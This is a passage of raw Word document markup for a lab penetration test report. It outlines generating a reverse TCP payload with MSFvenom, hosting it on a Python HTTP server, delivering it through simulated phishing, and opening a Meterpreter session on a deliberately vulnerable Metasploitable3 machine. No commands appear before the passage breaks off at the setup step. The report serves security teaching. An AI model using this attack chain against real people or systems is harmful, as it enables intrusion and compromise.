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20578D" w14:textId="77777777" w:rsidR="001A5749" w:rsidRPr="001A5749" w:rsidRDefault="001A5749" w:rsidP="001A5749">
      <w:pPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:jc w:val="center"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3CEE3CAB" w14:textId="2CCB77B8" w:rsidR="003E6359" w:rsidRPr="00CF4DBF" w:rsidRDefault="001A5749" w:rsidP="001A5749">
      <w:pPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CF4DBF">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00CF4DBF">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Reverse TCP Payload Penetration Test Report</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23975C63" w14:textId="77777777" w:rsidR="001A5749" w:rsidRDefault="001A5749" w:rsidP="001A5749">
      <w:pPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="618DA6D2" w14:textId="77777777" w:rsidR="001A5749" w:rsidRDefault="001A5749" w:rsidP="001A5749">
      <w:pPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="17D18473" w14:textId="77777777" w:rsidR="001A5749" w:rsidRDefault="001A5749" w:rsidP="001A5749">
      <w:pPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="464AD06E" w14:textId="77777777" w:rsidR="001A5749" w:rsidRDefault="001A5749" w:rsidP="001A5749">
      <w:pPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7E5F899F" w14:textId="77777777" w:rsidR="00CF4DBF" w:rsidRDefault="00CF4DBF" w:rsidP="001A5749">
      <w:pPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7DC8D75F" w14:textId="77777777" w:rsidR="00CF4DBF" w:rsidRDefault="00CF4DBF" w:rsidP="001A5749">
      <w:pPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6FFF490F" w14:textId="77777777" w:rsidR="00CF4DBF" w:rsidRDefault="00CF4DBF" w:rsidP="001A5749">
      <w:pPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0DC76163" w14:textId="77777777" w:rsidR="00CF4DBF" w:rsidRDefault="00CF4DBF" w:rsidP="001A5749">
      <w:pPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6634771A" w14:textId="77777777" w:rsidR="00CF4DBF" w:rsidRDefault="00CF4DBF" w:rsidP="001A5749">
      <w:pPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6ACA6623" w14:textId="6BF30EE6" w:rsidR="001A5749" w:rsidRPr="00CF4DBF" w:rsidRDefault="001A5749" w:rsidP="001A5749">
      <w:pPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CF4DBF">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Mohammed Jawad</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28CBBEF3" w14:textId="11C6DEC9" w:rsidR="003E6359" w:rsidRDefault="003E6359" w:rsidP="003E6359">
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="11393BCA" w14:textId="5BB76A08" w:rsidR="00325596" w:rsidRPr="00D33140" w:rsidRDefault="00325596" w:rsidP="00325596">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D33140">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Executive Summary</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="258576EA" w14:textId="6955876C" w:rsidR="00325596" w:rsidRPr="00325596" w:rsidRDefault="00325596" w:rsidP="00325596">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00325596">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">This penetration test was conducted to demonstrate the practical exploitation of a vulnerable system using a reverse TCP payload. The test utilized </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00325596">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>MSFvenom</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00325596">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> for payload generation, a </w:t>
      </w:r>
      <w:r w:rsidRPr="00325596">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Python HTTP server</w:t>
      </w:r>
      <w:r w:rsidRPr="00325596">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> for hosting and delivery, and </w:t>
      </w:r>
      <w:r w:rsidRPr="00325596">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Metasploit</w:t>
      </w:r>
      <w:r w:rsidRPr="00325596">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> for exploitation and session management. The target system was Metasploitable3, an intentionally vulnerable virtual machine, while the attacker system was Kali Linux. This controlled lab environment ensured ethical testing without affecting real-world systems.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C2FC255" w14:textId="77777777" w:rsidR="00325596" w:rsidRPr="00325596" w:rsidRDefault="00325596" w:rsidP="00325596">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00325596">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>The scope of the test involved creating a reverse TCP payload, simulating a phishing technique to deliver the payload, and successfully establishing a reverse shell connection to the target. The test uncovered critical vulnerabilities in Metasploitable3, including an outdated SMB service and a lack of endpoint security, which allowed for full compromise of the system.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51D2EA52" w14:textId="237427CE" w:rsidR="00325596" w:rsidRDefault="00325596" w:rsidP="00325596">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00325596">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>The successful execution of this penetration test highlights the importance of regular system updates, robust endpoint protection, and user training to mitigate risks. The findings underscore the need for organizations to address vulnerabilities proactively and implement security measures to prevent similar attacks in real-world scenarios.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62723F1F" w14:textId="3052F26A" w:rsidR="00325596" w:rsidRPr="00D33140" w:rsidRDefault="00325596" w:rsidP="00325596">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D33140">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Introduction</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53EC68D8" w14:textId="77777777" w:rsidR="00325596" w:rsidRPr="00325596" w:rsidRDefault="00325596" w:rsidP="00325596">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00325596">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Goals and Objectives</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F7F057B" w14:textId="77777777" w:rsidR="00325596" w:rsidRPr="00325596" w:rsidRDefault="00325596" w:rsidP="00325596">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00325596">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>The primary objective of this penetration test was to evaluate and demonstrate the effectiveness of a reverse TCP payload in exploiting a vulnerable system. The goals included:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3701FF73" w14:textId="77777777" w:rsidR="00325596" w:rsidRPr="00325596" w:rsidRDefault="00325596" w:rsidP="00325596">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00325596">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Generating a custom payload using </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00325596">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>MSFvenom</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00325596">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62B1A85B" w14:textId="77777777" w:rsidR="00325596" w:rsidRPr="00325596" w:rsidRDefault="00325596" w:rsidP="00325596">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00325596">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Hosting and delivering the payload using a Python HTTP server and simulated phishing techniques.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54949322" w14:textId="77777777" w:rsidR="00325596" w:rsidRPr="00325596" w:rsidRDefault="00325596" w:rsidP="00325596">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00325596">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Establishing a Meterpreter session for post-exploitation.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62DD64A7" w14:textId="77777777" w:rsidR="00325596" w:rsidRPr="00325596" w:rsidRDefault="00325596" w:rsidP="00325596">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00325596">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Scope</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="626B4AAF" w14:textId="77777777" w:rsidR="00325596" w:rsidRPr="00325596" w:rsidRDefault="00325596" w:rsidP="00325596">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00325596">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>The test was limited to the following:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="491D0A9E" w14:textId="77777777" w:rsidR="00325596" w:rsidRPr="00325596" w:rsidRDefault="00325596" w:rsidP="00325596">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00325596">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Kali Linux as the attacker's machine.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A2D3094" w14:textId="77777777" w:rsidR="00325596" w:rsidRPr="00325596" w:rsidRDefault="00325596" w:rsidP="00325596">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00325596">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Metasploitable3, an intentionally vulnerable system, as the target.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32AD8E29" w14:textId="77777777" w:rsidR="00325596" w:rsidRPr="00325596" w:rsidRDefault="00325596" w:rsidP="00325596">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00325596">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>No external network was involved, ensuring a controlled environment.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4733800E" w14:textId="77777777" w:rsidR="00325596" w:rsidRPr="00325596" w:rsidRDefault="00325596" w:rsidP="00325596">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00325596">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Assumptions and Exclusions</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DC465AA" w14:textId="010E9A9C" w:rsidR="00325596" w:rsidRPr="00325596" w:rsidRDefault="00D33140" w:rsidP="00325596">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00325596">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Assume</w:t>
      </w:r>
      <w:r w:rsidR="00325596" w:rsidRPr="00325596">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> Metasploitable3 was deliberately left vulnerable for testing.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="127CF6AA" w14:textId="77777777" w:rsidR="00325596" w:rsidRPr="00325596" w:rsidRDefault="00325596" w:rsidP="00325596">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00325596">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>No tests were conducted on real-world systems.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F0F8B4F" w14:textId="77777777" w:rsidR="00325596" w:rsidRPr="00325596" w:rsidRDefault="00325596" w:rsidP="00325596">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00325596">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Testing focused solely on reverse TCP payloads, excluding other vectors.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72602E56" w14:textId="1C132904" w:rsidR="00325596" w:rsidRPr="00325596" w:rsidRDefault="00325596" w:rsidP="00325596">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6EDE94DF" w14:textId="3CC5B590" w:rsidR="00325596" w:rsidRPr="00D33140" w:rsidRDefault="00325596" w:rsidP="00325596">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D33140">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Detailed Analyses</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C02241F" w14:textId="77777777" w:rsidR="00325596" w:rsidRPr="00325596" w:rsidRDefault="00325596" w:rsidP="00325596">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00325596">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Step 1: Environment Configuration</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2930B5DF" w14:textId="17BD821E" w:rsidR="00325596" w:rsidRPr="00325596" w:rsidRDefault="00325596" w:rsidP="00325596">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00325596">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Kali Linux</w:t>
      </w:r>
      <w:r w:rsidRPr="00325596">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> (Attacker): IP Address: 192.168.</w:t>
      </w:r>
      <w:r w:rsidR="007D03AE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>56</w:t>
      </w:r>
      <w:r w:rsidRPr="00325596">
